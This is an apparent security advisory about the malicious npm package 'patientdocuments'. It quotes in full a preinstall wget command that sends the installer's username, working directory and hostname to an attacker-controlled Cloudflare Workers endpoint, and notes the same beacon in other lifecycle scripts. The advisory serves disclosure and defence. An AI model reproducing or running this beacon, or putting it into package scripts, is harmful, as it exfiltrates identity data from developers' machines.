Malicious code in patientdocuments (npm)

__

Source: amazon-inspector (56c5ab4dc6470deaebe29f4851edb91bc5d5704e9f9578a91e238490708c007b)

package.json declares a preinstall lifecycle script that runs wget --quiet "http://orwa-orwa.dev-node-lap.workers.dev/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)", firing automatically on npm install. The script leaks the installer's OS username, current working directory, and hostname to an attacker-controlled Cloudflare Workers endpoint over plain HTTP. The same beacon is duplicated in the test and preupdate scripts. The package ships no library code (no main module shipped), so its sole effect is the recon beacon. unsafe-perm is set, ensuring execution as root in privileged install contexts. This is a dependency-confusion / recon-beacon pattern: identity exfiltration with no legitimate purpose tied to the package's advertised function.